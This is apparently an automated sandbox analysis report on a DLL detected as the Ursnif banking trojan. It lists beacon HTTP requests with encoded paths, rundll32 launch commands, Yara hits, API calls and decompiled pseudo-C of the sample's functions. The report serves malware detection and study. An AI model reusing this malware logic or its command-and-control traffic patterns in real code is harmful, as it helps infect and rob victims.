2021-10-11 22:39:27 UTC | 11 | OUT | GET /mail/liopolo/5hHdOh6aVGIiN/xm3v7_2B/EkShunhzAo7MsZ9CmkqFWtX/3z_2Bns4ON/91CWMsZkh9K0L_2FK/DGWBtSEwajEJ/0TtpREbudd5/QgJK102N2T9j48/a7_2B8h2NmEQ_2FO6HINr/eS5x2dWmrnxEuUas/E6VYZyoESNredc4/JUFmKkMiSye_2BBKeH/JexZCfmhU/vSKjW_2B8KOY/RYzBQt1.jre HTTP/1.1
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Pragma: no-cache
                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                        Host: msn.com
2021-10-11 22:39:27 UTC | 12 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                        Location: https://www.msn.com/mail/liopolo/5hHdOh6aVGIiN/xm3v7_2B/EkShunhzAo7MsZ9CmkqFWtX/3z_2Bns4ON/91CWMsZkh9K0L_2FK/DGWBtSEwajEJ/0TtpREbudd5/QgJK102N2T9j48/a7_2B8h2NmEQ_2FO6HINr/eS5x2dWmrnxEuUas/E6VYZyoESNredc4/JUFmKkMiSye_2BBKeH/JexZCfmhU/vSKjW_2B8KOY/RYzBQt1.jre
                                                                                                                        Server: Microsoft-IIS/8.5
                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                        Date: Mon, 11 Oct 2021 22:39:26 GMT
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 380
2021-10-11 22:39:27 UTC | 12 | IN | Data Ascii: <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="https://www.msn.com/mail/liopolo/5hHdOh6aVGIiN/xm3v7_2B/EkShunhzAo7MsZ9CmkqFWtX/3z_2Bns4ON/91CWMsZkh9K0L_2FK/DGWBtSEwajEJ/0TtpREbudd5/QgJK102N2T9j48/


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
9 | 192.168.2.4 | 49829 | 13.82.28.61 | 443 | C:\Windows\System32\loaddll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-11 22:39:34 UTC | 12 | OUT | GET /mail/liopolo/QoeEw7znNY9KuZLPv/PhlDvAFg0Bnn/nVx6DnTynJS/Jqe2AOjRD8vYJs/PuqBLIn3Zd37OXyJlwD7Q/FiLhjKnVW_2ByswX/LXphFosRYtREZOL/Q6wDOp8ES889SSlI1S/AFbHRrWLn/_2F7R_2FVhgDELEonTCy/KSLPzpnW0YF_2FoB4Xy/kHR_2F88KI6KqxU9hJvbKE/it_2FLM35/c.jre HTTP/1.1
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Connection: Keep-Alive
                                                                                                                        Pragma: no-cache
                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                                                        Host: msn.com
2021-10-11 22:39:34 UTC | 13 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                        Location: https://www.msn.com/mail/liopolo/QoeEw7znNY9KuZLPv/PhlDvAFg0Bnn/nVx6DnTynJS/Jqe2AOjRD8vYJs/PuqBLIn3Zd37OXyJlwD7Q/FiLhjKnVW_2ByswX/LXphFosRYtREZOL/Q6wDOp8ES889SSlI1S/AFbHRrWLn/_2F7R_2FVhgDELEonTCy/KSLPzpnW0YF_2FoB4Xy/kHR_2F88KI6KqxU9hJvbKE/it_2FLM35/c.jre
                                                                                                                        Server: Microsoft-IIS/8.5
                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                        Date: Mon, 11 Oct 2021 22:39:33 GMT
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 377
2021-10-11 22:39:34 UTC | 13 | IN | Data Ascii: <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="https://www.msn.com/mail/liopolo/QoeEw7znNY9KuZLPv/PhlDvAFg0Bnn/nVx6DnTynJS/Jqe2AOjRD8vYJs/PuqBLIn3Zd37OXyJlwD7Q/FiLhjKnVW_2ByswX/LXphFosRYtREZOL/Q6w


                                                                                                                        Code Manipulations

                                                                                                                        System Behavior

                                                                                                                        General

                                                                                                                        Start time:00:36:03
                                                                                                                        Start date:12/10/2021
                                                                                                                        Path:C:\Windows\System32\loaddll32.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:loaddll32.exe 'C:\Users\user\Desktop\616412739e268.dll'
                                                                                                                        Imagebase:0xd40000
                                                                                                                        File size:893440 bytes
                                                                                                                        MD5 hash:72FCD8FB0ADC38ED9050569AD673650E
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.916793229.0000000003BB8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.916426520.0000000003BB8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.916847995.0000000003BB8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.916379765.0000000003BB8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.1049081119.000000000383F000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.916579363.0000000003BB8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.960454814.0000000003A3B000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.917263832.0000000003BB8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000002.1185910848.00000000037C0000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.916716758.0000000003BB8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000003.859623257.0000000001390000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.916652805.0000000003BB8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.1006058312.000000000393D000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.916501324.0000000003BB8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.1185750269.0000000003559000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        Reputation:moderate

                                                                                                                        General

                                                                                                                        Start time:00:36:04
                                                                                                                        Start date:12/10/2021
                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\616412739e268.dll',#1
                                                                                                                        Imagebase:0x11d0000
                                                                                                                        File size:232960 bytes
                                                                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high

                                                                                                                        General

                                                                                                                        Start time:00:36:04
                                                                                                                        Start date:12/10/2021
                                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:rundll32.exe C:\Users\user\Desktop\616412739e268.dll,BeGrass
                                                                                                                        Imagebase:0x910000
                                                                                                                        File size:61952 bytes
                                                                                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.815784536.0000000003220000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                        Reputation:high

                                                                                                                        General

                                                                                                                        Start time:00:36:04
                                                                                                                        Start date:12/10/2021
                                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:rundll32.exe 'C:\Users\user\Desktop\616412739e268.dll',#1
                                                                                                                        Imagebase:0x910000
                                                                                                                        File size:61952 bytes
                                                                                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.974874720.000000000573B000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000002.1187092392.00000000054C0000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.930983342.00000000058B8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.930624015.00000000058B8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.1020193164.000000000563D000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.930910657.00000000058B8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.931064048.00000000058B8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000003.817641494.0000000003420000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.930863354.00000000058B8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.1063376109.000000000553F000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.931519942.00000000058B8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.931136929.00000000058B8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.930715901.00000000058B8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000002.1186977706.0000000005229000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.930775995.00000000058B8000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        Reputation:high

                                                                                                                        General

                                                                                                                        Start time:00:36:09
                                                                                                                        Start date:12/10/2021
                                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:rundll32.exe C:\Users\user\Desktop\616412739e268.dll,Fieldeight
                                                                                                                        Imagebase:0x910000
                                                                                                                        File size:61952 bytes
                                                                                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000004.00000003.843034391.00000000008A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                        Reputation:high

                                                                                                                        General

                                                                                                                        Start time:00:36:17
                                                                                                                        Start date:12/10/2021
                                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:rundll32.exe C:\Users\user\Desktop\616412739e268.dll,Often
                                                                                                                        Imagebase:0x910000
                                                                                                                        File size:61952 bytes
                                                                                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000005.00000003.855981301.0000000002EC0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000005.00000003.888775678.0000000004D09000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                        Reputation:high

                                                                                                                        General

                                                                                                                        Start time:00:37:46
                                                                                                                        Start date:12/10/2021
                                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7072 -s 636
                                                                                                                        Imagebase:0x10e0000
                                                                                                                        File size:434592 bytes
                                                                                                                        MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                        General

                                                                                                                        Start time:00:37:51
                                                                                                                        Start date:12/10/2021
                                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1364 -s 644
                                                                                                                        Imagebase:0x10e0000
                                                                                                                        File size:434592 bytes
                                                                                                                        MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                        General

                                                                                                                        Start time:00:37:56
                                                                                                                        Start date:12/10/2021
                                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6464 -s 632
                                                                                                                        Imagebase:0x10e0000
                                                                                                                        File size:434592 bytes
                                                                                                                        MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                        Disassembly

                                                                                                                        Code Analysis

                                                                                                                          Executed Functions

                                                                                                                          APIs
                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,000008C9,00003000,00000040,000008C9,6E37DA28), ref: 6E37E097
                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000128,00003000,00000040,6E37DA88), ref: 6E37E0CE
                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00016396,00003000,00000040), ref: 6E37E12E
                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E37E164
                                                                                                                          • VirtualProtect.KERNEL32(6E2D0000,00000000,00000004,6E37DFB9), ref: 6E37E269
                                                                                                                          • VirtualProtect.KERNEL32(6E2D0000,00001000,00000004,6E37DFB9), ref: 6E37E290
                                                                                                                          • VirtualProtect.KERNEL32(00000000,?,00000002,6E37DFB9), ref: 6E37E35D
                                                                                                                          • VirtualProtect.KERNEL32(00000000,?,00000002,6E37DFB9,?), ref: 6E37E3B3
                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E37E3CF
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186488728.000000006E37D000.00000040.00020000.sdmp, Offset: 6E37D000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: Virtual$Protect$Alloc$Free
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2574235972-0
                                                                                                                          • Opcode ID: e1f9e9c8b4d83524843fee0df09486a4519de377049ab59a5cd5e8b3584d8dfa
                                                                                                                          • Instruction ID: ee031c514a6d591727bb3d66cb2cb26eccd2cfbf2f132f1a8349e6477fbc51b9
                                                                                                                          • Opcode Fuzzy Hash: e1f9e9c8b4d83524843fee0df09486a4519de377049ab59a5cd5e8b3584d8dfa
                                                                                                                          • Instruction Fuzzy Hash: 4DD18E325206219FDF22CF55CC80A9237E7FF49B91F0841A8ED4A9F34AD375AA01CB64
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 83%
                                                                                                                          			E6E2D15C6(char _a4) {
                                                                                                                          				long _v8;
                                                                                                                          				long _v12;
                                                                                                                          				char _v36;
                                                                                                                          				void* __edi;
                                                                                                                          				long _t25;
                                                                                                                          				long _t27;
                                                                                                                          				long _t28;
                                                                                                                          				long _t32;
                                                                                                                          				void* _t38;
                                                                                                                          				intOrPtr _t40;
                                                                                                                          				signed int _t44;
                                                                                                                          				signed int _t45;
                                                                                                                          				long _t50;
                                                                                                                          				intOrPtr _t52;
                                                                                                                          				signed int _t53;
                                                                                                                          				void* _t57;
                                                                                                                          				void* _t60;
                                                                                                                          				signed int _t62;
                                                                                                                          				signed int _t63;
                                                                                                                          				void* _t67;
                                                                                                                          				intOrPtr* _t68;
                                                                                                                          
                                                                                                                          				_t25 = E6E2D1825();
                                                                                                                          				_v8 = _t25;
                                                                                                                          				if(_t25 != 0) {
                                                                                                                          					return _t25;
                                                                                                                          				}
                                                                                                                          				do {
                                                                                                                          					_t62 = 0;
                                                                                                                          					_v12 = 0;
                                                                                                                          					_t50 = 0x30;
                                                                                                                          					do {
                                                                                                                          						_t57 = E6E2D1000(_t50);
                                                                                                                          						if(_t57 == 0) {
                                                                                                                          							_v8 = 8;
                                                                                                                          						} else {
                                                                                                                          							_t44 = NtQuerySystemInformation(8, _t57, _t50,  &_v12); // executed
                                                                                                                          							_t53 = _t44;
                                                                                                                          							_t45 = _t44 & 0x0000ffff;
                                                                                                                          							_v8 = _t45;
                                                                                                                          							if(_t45 == 4) {
                                                                                                                          								_t50 = _t50 + 0x30;
                                                                                                                          							}
                                                                                                                          							_t63 = 0x13;
                                                                                                                          							_t10 = _t53 + 1; // 0x1
                                                                                                                          							_t62 =  *_t57 % _t63 + _t10;
                                                                                                                          							E6E2D1397(_t57);
                                                                                                                          						}
                                                                                                                          					} while (_v8 != 0);
                                                                                                                          					_t27 = E6E2D189E(_t57, _t62); // executed
                                                                                                                          					_v8 = _t27;
                                                                                                                          					Sleep(_t62 << 4); // executed
                                                                                                                          					_t28 = _v8;
                                                                                                                          				} while (_t28 == 9);
                                                                                                                          				if(_t28 != 0) {
                                                                                                                          					L25:
                                                                                                                          					return _t28;
                                                                                                                          				}
                                                                                                                          				if(_a4 != 0) {
                                                                                                                          					L18:
                                                                                                                          					_push(0);
                                                                                                                          					_t67 = E6E2D153C(E6E2D10B9,  &_v36);
                                                                                                                          					if(_t67 == 0) {
                                                                                                                          						_v8 = GetLastError();
                                                                                                                          					} else {
                                                                                                                          						_t32 = WaitForSingleObject(_t67, 0xffffffff);
                                                                                                                          						_v8 = _t32;
                                                                                                                          						if(_t32 == 0) {
                                                                                                                          							GetExitCodeThread(_t67,  &_v8);
                                                                                                                          						}
                                                                                                                          						CloseHandle(_t67);
                                                                                                                          					}
                                                                                                                          					_t28 = _v8;
                                                                                                                          					if(_t28 == 0xffffffff) {
                                                                                                                          						_t28 = GetLastError();
                                                                                                                          					}
                                                                                                                          					goto L25;
                                                                                                                          				}
                                                                                                                          				if(E6E2D1AD7(_t53,  &_a4) != 0) {
                                                                                                                          					 *0x6e2d41b8 = 0;
                                                                                                                          					goto L18;
                                                                                                                          				}
                                                                                                                          				_t52 = _a4;
                                                                                                                          				_t68 = __imp__GetLongPathNameW;
                                                                                                                          				_t38 =  *_t68(_t52, 0, 0); // executed
                                                                                                                          				_t60 = _t38;
                                                                                                                          				if(_t60 == 0) {
                                                                                                                          					L16:
                                                                                                                          					 *0x6e2d41b8 = _t52;
                                                                                                                          					goto L18;
                                                                                                                          				}
                                                                                                                          				_t19 = _t60 + 2; // 0x2
                                                                                                                          				_t40 = E6E2D1000(_t60 + _t19);
                                                                                                                          				 *0x6e2d41b8 = _t40;
                                                                                                                          				if(_t40 == 0) {
                                                                                                                          					goto L16;
                                                                                                                          				}
                                                                                                                          				 *_t68(_t52, _t40, _t60); // executed
                                                                                                                          				E6E2D1397(_t52);
                                                                                                                          				goto L18;
                                                                                                                          			}

























                                                                                                                          APIs
                                                                                                                            • Part of subcall function 6E2D1825: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6E2D15D1), ref: 6E2D1834
                                                                                                                            • Part of subcall function 6E2D1825: GetVersion.KERNEL32 ref: 6E2D1843
                                                                                                                            • Part of subcall function 6E2D1825: GetCurrentProcessId.KERNEL32 ref: 6E2D185F
                                                                                                                            • Part of subcall function 6E2D1825: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6E2D1878
                                                                                                                            • Part of subcall function 6E2D1000: HeapAlloc.KERNEL32(00000000,?,6E2D15ED,00000030,73B763F0,00000000), ref: 6E2D100C
                                                                                                                          • NtQuerySystemInformation.NTDLL(00000008,00000000,00000030,?), ref: 6E2D15FB
                                                                                                                          • Sleep.KERNELBASE(00000000,00000000,00000030,73B763F0,00000000), ref: 6E2D1642
                                                                                                                          • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 6E2D1678
                                                                                                                          • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 6E2D1696
                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,6E2D10B9,?,00000000), ref: 6E2D16CD
                                                                                                                          • GetExitCodeThread.KERNEL32(00000000,00000000), ref: 6E2D16DF
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 6E2D16E6
                                                                                                                          • GetLastError.KERNEL32(6E2D10B9,?,00000000), ref: 6E2D16EE
                                                                                                                          • GetLastError.KERNEL32 ref: 6E2D16FB
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186146468.000000006E2D1000.00000020.00020000.sdmp, Offset: 6E2D0000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1186122026.000000006E2D0000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.1186170989.000000006E2D3000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.1186191044.000000006E2D5000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.1186206553.000000006E2D6000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLastLongNamePathProcess$AllocCloseCodeCreateCurrentEventExitHandleHeapInformationObjectOpenQuerySingleSleepSystemThreadVersionWait
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3479304935-0
                                                                                                                          • Opcode ID: 19ecee1ddca25a873985523a9a549fad8d1b4870026fa34f0f81eecc6887921a
                                                                                                                          • Instruction ID: 53b62928b4dd85e632d40fb7ed7caca95fb4b5088f728fd8fde333475fbe5395
                                                                                                                          • Opcode Fuzzy Hash: 19ecee1ddca25a873985523a9a549fad8d1b4870026fa34f0f81eecc6887921a
                                                                                                                          • Instruction Fuzzy Hash: D631B275D0461EABD7509BE4CC48A9E7BBEAB46766F144122EB00D3540DB30CACCCBE0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 69%
                                                                                                                          			E6E2D1172(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
                                                                                                                          				intOrPtr _v12;
                                                                                                                          				struct _FILETIME* _v16;
                                                                                                                          				short _v60;
                                                                                                                          				struct _FILETIME* _t14;
                                                                                                                          				intOrPtr _t15;
                                                                                                                          				long _t18;
                                                                                                                          				void* _t19;
                                                                                                                          				void* _t22;
                                                                                                                          				intOrPtr _t31;
                                                                                                                          				long _t32;
                                                                                                                          				void* _t34;
                                                                                                                          
                                                                                                                          				_t31 = __edx;
                                                                                                                          				_t14 =  &_v16;
                                                                                                                          				GetSystemTimeAsFileTime(_t14);
                                                                                                                          				_push(0x192);
                                                                                                                          				_push(0x54d38000);
                                                                                                                          				_push(_v12);
                                                                                                                          				_push(_v16);
                                                                                                                          				L6E2D2160();
                                                                                                                          				_push(_t14);
                                                                                                                          				_v16 = _t14;
                                                                                                                          				_t15 =  *0x6e2d41c4;
                                                                                                                          				_push(_t15 + 0x6e2d505e);
                                                                                                                          				_push(_t15 + 0x6e2d5054);
                                                                                                                          				_push(0x16);
                                                                                                                          				_push( &_v60);
                                                                                                                          				_v12 = _t31;
                                                                                                                          				L6E2D215A();
                                                                                                                          				_t18 = _a4;
                                                                                                                          				if(_t18 == 0) {
                                                                                                                          					_t18 = 0x1000;
                                                                                                                          				}
                                                                                                                          				_t19 = CreateFileMappingW(0xffffffff, 0x6e2d41c8, 4, 0, _t18,  &_v60); // executed
                                                                                                                          				_t34 = _t19;
                                                                                                                          				if(_t34 == 0) {
                                                                                                                          					_t32 = GetLastError();
                                                                                                                          				} else {
                                                                                                                          					if(_a4 != 0 || GetLastError() == 0xb7) {
                                                                                                                          						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
                                                                                                                          						if(_t22 == 0) {
                                                                                                                          							_t32 = GetLastError();
                                                                                                                          							if(_t32 != 0) {
                                                                                                                          								goto L9;
                                                                                                                          							}
                                                                                                                          						} else {
                                                                                                                          							 *_a8 = _t34;
                                                                                                                          							 *_a12 = _t22;
                                                                                                                          							_t32 = 0;
                                                                                                                          						}
                                                                                                                          					} else {
                                                                                                                          						_t32 = 2;
                                                                                                                          						L9:
                                                                                                                          						CloseHandle(_t34);
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				return _t32;
                                                                                                                          			}















                                                                                                                          APIs
                                                                                                                          • GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,6E2D1132,0000000A,?,?), ref: 6E2D117F
                                                                                                                          • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6E2D1195
                                                                                                                          • _snwprintf.NTDLL ref: 6E2D11BA
                                                                                                                          • CreateFileMappingW.KERNELBASE(000000FF,6E2D41C8,00000004,00000000,?,?), ref: 6E2D11DF
                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E2D1132,0000000A,?), ref: 6E2D11F6
                                                                                                                          • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 6E2D120A
                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E2D1132,0000000A,?), ref: 6E2D1222
                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6E2D1132,0000000A), ref: 6E2D122B
                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E2D1132,0000000A,?), ref: 6E2D1233
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186146468.000000006E2D1000.00000020.00020000.sdmp, Offset: 6E2D0000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1186122026.000000006E2D0000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.1186170989.000000006E2D3000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.1186191044.000000006E2D5000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000000.00000002.1186206553.000000006E2D6000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1724014008-0
                                                                                                                          • Opcode ID: 3fd14a25436f99e638c1011dafc1ba8497cc7a3d5337baf7d020c32aeecc8cee
                                                                                                                          • Instruction ID: c401ed905ab27c145aab1f909071ab6585dc911f1880a00846148f1749ad1bcb
                                                                                                                          • Opcode Fuzzy Hash: 3fd14a25436f99e638c1011dafc1ba8497cc7a3d5337baf7d020c32aeecc8cee
                                                                                                                          • Instruction Fuzzy Hash: 612190B690011DAFDB00AFE8CC8CE9E77BAFB49356F118125F715E7180D6B199498B70
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,000008BB), ref: 6E2E5696
